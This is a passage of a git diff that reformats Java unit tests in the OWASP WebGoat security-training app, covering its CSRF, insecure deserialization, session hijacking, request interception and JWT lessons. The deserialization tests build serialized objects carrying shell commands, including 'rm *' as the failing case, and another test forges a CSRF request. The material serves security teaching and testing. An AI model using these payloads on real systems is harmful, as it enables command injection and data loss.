-    public void postingJsonMessageThroughWebGoatShouldWork() throws Exception {
-        mockMvc.perform(post("/csrf/feedback/message")
+  @Test
+  public void postingJsonMessageThroughWebGoatShouldWork() throws Exception {
+    mockMvc
+        .perform(
+            post("/csrf/feedback/message")
                 .contentType(MediaType.APPLICATION_JSON)
-                .content("{\"name\": \"Test\", \"email\": \"test1233@dfssdf.de\", \"subject\": \"service\", \"message\":\"dsaffd\"}"))
-                .andExpect(status().isOk());
-    }
+                .content(
+                    "{\"name\": \"Test\", \"email\": \"test1233@dfssdf.de\", \"subject\":"
+                        + " \"service\", \"message\":\"dsaffd\"}"))
+        .andExpect(status().isOk());
+  }
 
-
-    @Test
-    public void csrfAttack() throws Exception {
-        mockMvc.perform(post("/csrf/feedback/message")
+  @Test
+  public void csrfAttack() throws Exception {
+    mockMvc
+        .perform(
+            post("/csrf/feedback/message")
                 .contentType(MediaType.TEXT_PLAIN)
                 .cookie(new Cookie("JSESSIONID", "test"))
                 .header("host", "localhost:8080")
                 .header("referer", "webgoat.org")
-                .content("{\"name\": \"Test\", \"email\": \"test1233@dfssdf.de\", \"subject\": \"service\", \"message\":\"dsaffd\"}"))
-                .andExpect(jsonPath("lessonCompleted", is(true)))
-                .andExpect(jsonPath("feedback", StringContains.containsString("the flag is: ")));
-    }
+                .content(
+                    "{\"name\": \"Test\", \"email\": \"test1233@dfssdf.de\", \"subject\":"
+                        + " \"service\", \"message\":\"dsaffd\"}"))
+        .andExpect(jsonPath("lessonCompleted", is(true)))
+        .andExpect(jsonPath("feedback", StringContains.containsString("the flag is: ")));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/deserialization/DeserializeTest.java b/src/test/java/org/owasp/webgoat/lessons/deserialization/DeserializeTest.java
index 1840ce0b9..802c8c672 100644
--- a/src/test/java/org/owasp/webgoat/lessons/deserialization/DeserializeTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/deserialization/DeserializeTest.java
@@ -1,5 +1,10 @@
 package org.owasp.webgoat.lessons.deserialization;
 
+import static org.hamcrest.Matchers.is;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
+import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
+
 import org.dummy.insecure.framework.VulnerableTaskHolder;
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
@@ -10,72 +15,97 @@ import org.owasp.webgoat.container.assignments.AssignmentEndpointTest;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
-import static org.hamcrest.Matchers.is;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
-import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
-
 @ExtendWith(MockitoExtension.class)
 class DeserializeTest extends AssignmentEndpointTest {
 
-    private MockMvc mockMvc;
+  private MockMvc mockMvc;
 
-    private static String OS = System.getProperty("os.name").toLowerCase();
+  private static String OS = System.getProperty("os.name").toLowerCase();
 
-    @BeforeEach
-    void setup() {
-        InsecureDeserializationTask insecureTask = new InsecureDeserializationTask();
-        init(insecureTask);
-        this.mockMvc = standaloneSetup(insecureTask).build();
+  @BeforeEach
+  void setup() {
+    InsecureDeserializationTask insecureTask = new InsecureDeserializationTask();
+    init(insecureTask);
+    this.mockMvc = standaloneSetup(insecureTask).build();
+  }
+
+  @Test
+  void success() throws Exception {
+    if (OS.indexOf("win") > -1) {
+      mockMvc
+          .perform(
+              MockMvcRequestBuilders.post("/InsecureDeserialization/task")
+                  .param(
+                      "token",
+                      SerializationHelper.toString(
+                          new VulnerableTaskHolder("wait", "ping localhost -n 5"))))
+          .andExpect(status().isOk())
+          .andExpect(jsonPath("$.lessonCompleted", is(true)));
+    } else {
+      mockMvc
+          .perform(
+              MockMvcRequestBuilders.post("/InsecureDeserialization/task")
+                  .param(
+                      "token",
+                      SerializationHelper.toString(new VulnerableTaskHolder("wait", "sleep 5"))))
+          .andExpect(status().isOk())
+          .andExpect(jsonPath("$.lessonCompleted", is(true)));
     }
+  }
 
-    @Test
-    void success() throws Exception {
-        if (OS.indexOf("win") > -1) {
-            mockMvc.perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task")
-                    .param("token", SerializationHelper.toString(new VulnerableTaskHolder("wait", "ping localhost -n 5"))))
-                    .andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(true)));
-        } else {
-            mockMvc.perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task")
-                    .param("token", SerializationHelper.toString(new VulnerableTaskHolder("wait", "sleep 5"))))
-                    .andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(true)));
-        }
-    }
+  @Test
+  void fail() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/InsecureDeserialization/task")
+                .param(
+                    "token",
+                    SerializationHelper.toString(new VulnerableTaskHolder("delete", "rm *"))))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(false)));
+  }
 
-    @Test
-    void fail() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task")
-                .param("token", SerializationHelper.toString(new VulnerableTaskHolder("delete", "rm *"))))
-                .andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(false)));
-    }
+  @Test
+  void wrongVersion() throws Exception {
+    String token =
+        "rO0ABXNyADFvcmcuZHVtbXkuaW5zZWN1cmUuZnJhbWV3b3JrLlZ1bG5lcmFibGVUYXNrSG9sZGVyAAAAAAAAAAECAANMABZyZXF1ZXN0ZWRFeGVjdXRpb25UaW1ldAAZTGphdmEvdGltZS9Mb2NhbERhdGVUaW1lO0wACnRhc2tBY3Rpb250ABJMamF2YS9sYW5nL1N0cmluZztMAAh0YXNrTmFtZXEAfgACeHBzcgANamF2YS50aW1lLlNlcpVdhLobIkiyDAAAeHB3DgUAAAfjCR4GIQgMLRSoeHQACmVjaG8gaGVsbG90AAhzYXlIZWxsbw";
+    mockMvc
+        .perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task").param("token", token))
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath(
+                "$.feedback",
+                CoreMatchers.is(
+                    pluginMessages.getMessage("insecure-deserialization.invalidversion"))))
+        .andExpect(jsonPath("$.lessonCompleted", is(false)));
+  }
 
-    @Test
-    void wrongVersion() throws Exception {
-        String token = "rO0ABXNyADFvcmcuZHVtbXkuaW5zZWN1cmUuZnJhbWV3b3JrLlZ1bG5lcmFibGVUYXNrSG9sZGVyAAAAAAAAAAECAANMABZyZXF1ZXN0ZWRFeGVjdXRpb25UaW1ldAAZTGphdmEvdGltZS9Mb2NhbERhdGVUaW1lO0wACnRhc2tBY3Rpb250ABJMamF2YS9sYW5nL1N0cmluZztMAAh0YXNrTmFtZXEAfgACeHBzcgANamF2YS50aW1lLlNlcpVdhLobIkiyDAAAeHB3DgUAAAfjCR4GIQgMLRSoeHQACmVjaG8gaGVsbG90AAhzYXlIZWxsbw";
-        mockMvc.perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task")
-                .param("token", token))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(pluginMessages.getMessage("insecure-deserialization.invalidversion"))))
-                .andExpect(jsonPath("$.lessonCompleted", is(false)));
-    }
+  @Test
+  void expiredTask() throws Exception {
+    String token =
+        "rO0ABXNyADFvcmcuZHVtbXkuaW5zZWN1cmUuZnJhbWV3b3JrLlZ1bG5lcmFibGVUYXNrSG9sZGVyAAAAAAAAAAICAANMABZyZXF1ZXN0ZWRFeGVjdXRpb25UaW1ldAAZTGphdmEvdGltZS9Mb2NhbERhdGVUaW1lO0wACnRhc2tBY3Rpb250ABJMamF2YS9sYW5nL1N0cmluZztMAAh0YXNrTmFtZXEAfgACeHBzcgANamF2YS50aW1lLlNlcpVdhLobIkiyDAAAeHB3DgUAAAfjCR4IDC0YfvNIeHQACmVjaG8gaGVsbG90AAhzYXlIZWxsbw";
+    mockMvc
+        .perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task").param("token", token))
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath(
+                "$.feedback",
+                CoreMatchers.is(pluginMessages.getMessage("insecure-deserialization.expired"))))
+        .andExpect(jsonPath("$.lessonCompleted", is(false)));
+  }
 
-    @Test
-    void expiredTask() throws Exception {
-        String token = "rO0ABXNyADFvcmcuZHVtbXkuaW5zZWN1cmUuZnJhbWV3b3JrLlZ1bG5lcmFibGVUYXNrSG9sZGVyAAAAAAAAAAICAANMABZyZXF1ZXN0ZWRFeGVjdXRpb25UaW1ldAAZTGphdmEvdGltZS9Mb2NhbERhdGVUaW1lO0wACnRhc2tBY3Rpb250ABJMamF2YS9sYW5nL1N0cmluZztMAAh0YXNrTmFtZXEAfgACeHBzcgANamF2YS50aW1lLlNlcpVdhLobIkiyDAAAeHB3DgUAAAfjCR4IDC0YfvNIeHQACmVjaG8gaGVsbG90AAhzYXlIZWxsbw";
-        mockMvc.perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task")
-                .param("token", token))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(pluginMessages.getMessage("insecure-deserialization.expired"))))
-                .andExpect(jsonPath("$.lessonCompleted", is(false)));
-    }
-
-    @Test
-    void checkOtherObject() throws Exception {
-        String token = "rO0ABXQAVklmIHlvdSBkZXNlcmlhbGl6ZSBtZSBkb3duLCBJIHNoYWxsIGJlY29tZSBtb3JlIHBvd2VyZnVsIHRoYW4geW91IGNhbiBwb3NzaWJseSBpbWFnaW5l";
-        mockMvc.perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task")
-                .param("token", token))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(pluginMessages.getMessage("insecure-deserialization.stringobject"))))
-                .andExpect(jsonPath("$.lessonCompleted", is(false)));
-    }
+  @Test
+  void checkOtherObject() throws Exception {
+    String token =
+        "rO0ABXQAVklmIHlvdSBkZXNlcmlhbGl6ZSBtZSBkb3duLCBJIHNoYWxsIGJlY29tZSBtb3JlIHBvd2VyZnVsIHRoYW4geW91IGNhbiBwb3NzaWJseSBpbWFnaW5l";
+    mockMvc
+        .perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task").param("token", token))
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath(
+                "$.feedback",
+                CoreMatchers.is(
+                    pluginMessages.getMessage("insecure-deserialization.stringobject"))))
+        .andExpect(jsonPath("$.lessonCompleted", is(false)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/hijacksession/HijackSessionAssignmentTest.java b/src/test/java/org/owasp/webgoat/lessons/hijacksession/HijackSessionAssignmentTest.java
index 5074b23ea..c005b411b 100644
--- a/src/test/java/org/owasp/webgoat/lessons/hijacksession/HijackSessionAssignmentTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/hijacksession/HijackSessionAssignmentTest.java
@@ -22,6 +22,15 @@
 
 package org.owasp.webgoat.lessons.hijacksession;
 
+import static org.hamcrest.Matchers.emptyString;
+import static org.hamcrest.Matchers.not;
+import static org.mockito.ArgumentMatchers.any;
+import static org.mockito.Mockito.lenient;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.cookie;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
+
+import javax.servlet.http.Cookie;
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
@@ -36,16 +45,6 @@ import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.ResultActions;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
-import javax.servlet.http.Cookie;
-
-import static org.hamcrest.Matchers.emptyString;
-import static org.hamcrest.Matchers.not;
-import static org.mockito.ArgumentMatchers.any;
-import static org.mockito.Mockito.lenient;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.cookie;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
-import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
-
 /***
  *
  * @author Angel Olle Blazquez
@@ -55,54 +54,53 @@ import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standal
 @ExtendWith(MockitoExtension.class)
 class HijackSessionAssignmentTest extends AssignmentEndpointTest {
 
-    private MockMvc mockMvc;
-    private static final String COOKIE_NAME = "hijack_cookie";
-    private static final String LOGIN_CONTEXT_PATH = "/HijackSession/login";
+  private MockMvc mockMvc;
+  private static final String COOKIE_NAME = "hijack_cookie";
+  private static final String LOGIN_CONTEXT_PATH = "/HijackSession/login";
 
-    @Mock
-    Authentication authenticationMock;
+  @Mock Authentication authenticationMock;
 
-    @Mock
-    HijackSessionAuthenticationProvider providerMock;
+  @Mock HijackSessionAuthenticationProvider providerMock;
 
-    HijackSessionAssignment assignment;
+  HijackSessionAssignment assignment;
 
-    @BeforeEach
-    void setup() {
-        assignment = new HijackSessionAssignment();
-        init(assignment);
-        ReflectionTestUtils.setField(assignment, "provider", new HijackSessionAuthenticationProvider());
-        mockMvc = standaloneSetup(assignment).build();
-    }
+  @BeforeEach
+  void setup() {
+    assignment = new HijackSessionAssignment();
+    init(assignment);
+    ReflectionTestUtils.setField(assignment, "provider", new HijackSessionAuthenticationProvider());
+    mockMvc = standaloneSetup(assignment).build();
+  }
 
-    @Test
-    void testValidCookie() throws Exception {
-        lenient().when(authenticationMock.isAuthenticated()).thenReturn(true);
-        lenient().when(providerMock.authenticate(any(Authentication.class))).thenReturn(authenticationMock);
-        ReflectionTestUtils.setField(assignment, "provider", providerMock);
+  @Test
+  void testValidCookie() throws Exception {
+    lenient().when(authenticationMock.isAuthenticated()).thenReturn(true);
+    lenient()
+        .when(providerMock.authenticate(any(Authentication.class)))
+        .thenReturn(authenticationMock);
+    ReflectionTestUtils.setField(assignment, "provider", providerMock);
 
-        Cookie cookie = new Cookie(COOKIE_NAME, "value");
+    Cookie cookie = new Cookie(COOKIE_NAME, "value");
 
-        ResultActions result = mockMvc.perform(MockMvcRequestBuilders
-            .post(LOGIN_CONTEXT_PATH)
-            .cookie(cookie)
-            .param("username", "")
-            .param("password", ""));
+    ResultActions result =
+        mockMvc.perform(
+            MockMvcRequestBuilders.post(LOGIN_CONTEXT_PATH)
+                .cookie(cookie)
+                .param("username", "")
+                .param("password", ""));
 
-        result.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
+    result.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
+  }
 
-    }
-
-    @Test
-    void testBlankCookie() throws Exception {
-        ResultActions result = mockMvc.perform(MockMvcRequestBuilders
-            .post(LOGIN_CONTEXT_PATH)
-            .param("username", "webgoat")
-            .param("password", "webgoat"));
-
-        result.andExpect(cookie().value(COOKIE_NAME, not(emptyString())));
-        result.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-
-    }
+  @Test
+  void testBlankCookie() throws Exception {
+    ResultActions result =
+        mockMvc.perform(
+            MockMvcRequestBuilders.post(LOGIN_CONTEXT_PATH)
+                .param("username", "webgoat")
+                .param("password", "webgoat"));
 
+    result.andExpect(cookie().value(COOKIE_NAME, not(emptyString())));
+    result.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/hijacksession/cas/HijackSessionAuthenticationProviderTest.java b/src/test/java/org/owasp/webgoat/lessons/hijacksession/cas/HijackSessionAuthenticationProviderTest.java
index 23bed9dce..e99477627 100644
--- a/src/test/java/org/owasp/webgoat/lessons/hijacksession/cas/HijackSessionAuthenticationProviderTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/hijacksession/cas/HijackSessionAuthenticationProviderTest.java
@@ -28,16 +28,13 @@ import static org.hamcrest.CoreMatchers.not;
 import static org.hamcrest.MatcherAssert.assertThat;
 
 import java.util.stream.Stream;
-
 import org.apache.commons.lang3.StringUtils;
 import org.junit.jupiter.api.DisplayName;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.params.ParameterizedTest;
 import org.junit.jupiter.params.provider.Arguments;
 import org.junit.jupiter.params.provider.MethodSource;
-import org.owasp.webgoat.lessons.hijacksession.cas.Authentication;
 import org.owasp.webgoat.lessons.hijacksession.cas.Authentication.AuthenticationBuilder;
-import org.owasp.webgoat.lessons.hijacksession.cas.HijackSessionAuthenticationProvider;
 
 /***
  *
@@ -47,72 +44,82 @@ import org.owasp.webgoat.lessons.hijacksession.cas.HijackSessionAuthenticationPr
 
 class HijackSessionAuthenticationProviderTest {
 
-    HijackSessionAuthenticationProvider provider = new HijackSessionAuthenticationProvider();
+  HijackSessionAuthenticationProvider provider = new HijackSessionAuthenticationProvider();
 
-    @ParameterizedTest
-    @DisplayName("Provider authentication test")
-    @MethodSource("authenticationForCookieValues")
-    void testProviderAuthenticationGeneratesCookie(Authentication authentication) {
-        Authentication auth = provider.authenticate(authentication);
-        assertThat(auth.getId(), not(StringUtils.isEmpty(auth.getId())));
-    }
+  @ParameterizedTest
+  @DisplayName("Provider authentication test")
+  @MethodSource("authenticationForCookieValues")
+  void testProviderAuthenticationGeneratesCookie(Authentication authentication) {
+    Authentication auth = provider.authenticate(authentication);
+    assertThat(auth.getId(), not(StringUtils.isEmpty(auth.getId())));
+  }
 
-    @Test
-    void testAuthenticated() {
-        String id = "anyId";
-        provider.addSession(id);
+  @Test
+  void testAuthenticated() {
+    String id = "anyId";
+    provider.addSession(id);
 
-        Authentication auth = provider.authenticate(Authentication.builder().id(id).build());
+    Authentication auth = provider.authenticate(Authentication.builder().id(id).build());
 
-        assertThat(auth.getId(), is(id));
-        assertThat(auth.isAuthenticated(), is(true));
+    assertThat(auth.getId(), is(id));
+    assertThat(auth.isAuthenticated(), is(true));
 
-        auth = provider.authenticate(Authentication.builder().id("otherId").build());
+    auth = provider.authenticate(Authentication.builder().id("otherId").build());
 
-        assertThat(auth.getId(), is("otherId"));
-        assertThat(auth.isAuthenticated(), is(false));
-    }
+    assertThat(auth.getId(), is("otherId"));
+    assertThat(auth.isAuthenticated(), is(false));
+  }
 
-    @Test
-    void testAuthenticationToString() {
-        AuthenticationBuilder authBuilder = Authentication.builder()
+  @Test
+  void testAuthenticationToString() {
+    AuthenticationBuilder authBuilder =
+        Authentication.builder()
             .name("expectedName")
             .credentials("expectedCredentials")
             .id("expectedId");
 
-        Authentication auth = authBuilder.build();
+    Authentication auth = authBuilder.build();
 
-        String expected = "Authentication.AuthenticationBuilder("
-                + "name=" + auth.getName()
-                + ", credentials=" + auth.getCredentials()
-                + ", id=" + auth.getId() + ")";
+    String expected =
+        "Authentication.AuthenticationBuilder("
+            + "name="
+            + auth.getName()
+            + ", credentials="
+            + auth.getCredentials()
+            + ", id="
+            + auth.getId()
+            + ")";
 
-        assertThat(authBuilder.toString(), is(expected));
+    assertThat(authBuilder.toString(), is(expected));
 
-        expected = "Authentication(authenticated=" + auth.isAuthenticated()
-                + ", name=" + auth.getName()
-                + ", credentials=" + auth.getCredentials()
-                + ", id=" + auth.getId() + ")";
+    expected =
+        "Authentication(authenticated="
+            + auth.isAuthenticated()
+            + ", name="
+            + auth.getName()
+            + ", credentials="
+            + auth.getCredentials()
+            + ", id="
+            + auth.getId()
+            + ")";
 
-        assertThat(auth.toString(), is(expected));
+    assertThat(auth.toString(), is(expected));
+  }
 
+  @Test
+  void testMaxSessions() {
+    for (int i = 0; i <= HijackSessionAuthenticationProvider.MAX_SESSIONS + 1; i++) {
+      provider.authorizedUserAutoLogin();
+      provider.addSession(null);
     }
 
-    @Test
-    void testMaxSessions() {
-        for (int i = 0; i <= HijackSessionAuthenticationProvider.MAX_SESSIONS + 1; i++) {
-            provider.authorizedUserAutoLogin();
-            provider.addSession(null);
-        }
-
-        assertThat(provider.getSessionsSize(), is(HijackSessionAuthenticationProvider.MAX_SESSIONS));
-    }
-
-    private static Stream<Arguments> authenticationForCookieValues() {
-        return Stream.of(
-            Arguments.of((Object) null),
-            Arguments.of(Authentication.builder().name("any").credentials("any").build()),
-            Arguments.of(Authentication.builder().id("any").build()));
-    }
+    assertThat(provider.getSessionsSize(), is(HijackSessionAuthenticationProvider.MAX_SESSIONS));
+  }
 
+  private static Stream<Arguments> authenticationForCookieValues() {
+    return Stream.of(
+        Arguments.of((Object) null),
+        Arguments.of(Authentication.builder().name("any").credentials("any").build()),
+        Arguments.of(Authentication.builder().id("any").build()));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/httpproxies/HttpBasicsInterceptRequestTest.java b/src/test/java/org/owasp/webgoat/lessons/httpproxies/HttpBasicsInterceptRequestTest.java
index 8cbc86bb7..4ba92bf70 100644
--- a/src/test/java/org/owasp/webgoat/lessons/httpproxies/HttpBasicsInterceptRequestTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/httpproxies/HttpBasicsInterceptRequestTest.java
@@ -22,77 +22,101 @@
 
 package org.owasp.webgoat.lessons.httpproxies;
 
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
+import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
+
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.junit.jupiter.MockitoExtension;
 import org.owasp.webgoat.container.assignments.AssignmentEndpointTest;
-import org.owasp.webgoat.lessons.httpproxies.HttpBasicsInterceptRequest;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
-import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
-
 @ExtendWith(MockitoExtension.class)
 public class HttpBasicsInterceptRequestTest extends AssignmentEndpointTest {
 
-    private MockMvc mockMvc;
+  private MockMvc mockMvc;
 
-    @BeforeEach
-    public void setup() {
-        HttpBasicsInterceptRequest httpBasicsInterceptRequest = new HttpBasicsInterceptRequest();
-        init(httpBasicsInterceptRequest);
-        this.mockMvc = standaloneSetup(httpBasicsInterceptRequest).build();
-    }
+  @BeforeEach
+  public void setup() {
+    HttpBasicsInterceptRequest httpBasicsInterceptRequest = new HttpBasicsInterceptRequest();
+    init(httpBasicsInterceptRequest);
+    this.mockMvc = standaloneSetup(httpBasicsInterceptRequest).build();
+  }
 
-    @Test
-    public void success() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.get("/HttpProxies/intercept-request")
+  @Test
+  public void success() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.get("/HttpProxies/intercept-request")
                 .header("x-request-intercepted", "true")
                 .param("changeMe", "Requests are tampered easily"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(pluginMessages.getMessage("http-proxies.intercept.success"))))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
-    }
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath(
+                "$.feedback",
+                CoreMatchers.is(pluginMessages.getMessage("http-proxies.intercept.success"))))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
+  }
 
-    @Test
-    public void failure() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.get("/HttpProxies/intercept-request")
+  @Test
+  public void failure() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.get("/HttpProxies/intercept-request")
                 .header("x-request-intercepted", "false")
                 .param("changeMe", "Requests are tampered easily"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(pluginMessages.getMessage("http-proxies.intercept.failure"))))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-    }
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath(
+                "$.feedback",
+                CoreMatchers.is(pluginMessages.getMessage("http-proxies.intercept.failure"))))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 
-    @Test
-    public void missingParam() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.get("/HttpProxies/intercept-request")
+  @Test
+  public void missingParam() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.get("/HttpProxies/intercept-request")
                 .header("x-request-intercepted", "false"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(pluginMessages.getMessage("http-proxies.intercept.failure"))))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-    }
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath(
+                "$.feedback",
+                CoreMatchers.is(pluginMessages.getMessage("http-proxies.intercept.failure"))))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 
-    @Test
-    public void missingHeader() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.get("/HttpProxies/intercept-request")
+  @Test
+  public void missingHeader() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.get("/HttpProxies/intercept-request")
                 .param("changeMe", "Requests are tampered easily"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(pluginMessages.getMessage("http-proxies.intercept.failure"))))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-    }
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath(
+                "$.feedback",
+                CoreMatchers.is(pluginMessages.getMessage("http-proxies.intercept.failure"))))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 
-    @Test
-    public void whenPostAssignmentShouldNotPass() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/HttpProxies/intercept-request")
+  @Test
+  public void whenPostAssignmentShouldNotPass() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/HttpProxies/intercept-request")
                 .header("x-request-intercepted", "true")
                 .param("changeMe", "Requests are tampered easily"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(pluginMessages.getMessage("http-proxies.intercept.failure"))))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-    }
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath(
+                "$.feedback",
+                CoreMatchers.is(pluginMessages.getMessage("http-proxies.intercept.failure"))))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/jwt/JWTDecodeEndpointTest.java b/src/test/java/org/owasp/webgoat/lessons/jwt/JWTDecodeEndpointTest.java
index 45ee41a7b..23afbc725 100644
--- a/src/test/java/org/owasp/webgoat/lessons/jwt/JWTDecodeEndpointTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/jwt/JWTDecodeEndpointTest.java
@@ -1,43 +1,41 @@
 package org.owasp.webgoat.lessons.jwt;
 
-import org.junit.jupiter.api.BeforeEach;
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.jwt.JWT;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-import org.springframework.test.web.servlet.setup.MockMvcBuilders;
-
 import static org.hamcrest.Matchers.is;
 import static org.mockito.Mockito.when;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+import org.springframework.test.web.servlet.setup.MockMvcBuilders;
+
 public class JWTDecodeEndpointTest extends LessonTest {
 
-    @BeforeEach
-    public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(new JWT());
-        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-    }
+  @BeforeEach
+  public void setup() {
+    when(webSession.getCurrentLesson()).thenReturn(new JWT());
+    this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+  }
 
-    @Test
-    public void solveAssignment() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/decode")
-                .param("jwt-encode-user", "user")
-                .content(""))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", is(true)));
-    }
+  @Test
+  public void solveAssignment() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/JWT/decode").param("jwt-encode-user", "user").content(""))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(true)));
+  }
 
-    @Test
-    public void wrongUserShouldNotSolveAssignment() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/decode")
+  @Test
+  public void wrongUserShouldNotSolveAssignment() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/JWT/decode")
                 .param("jwt-encode-user", "wrong")
                 .content(""))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", is(false)));
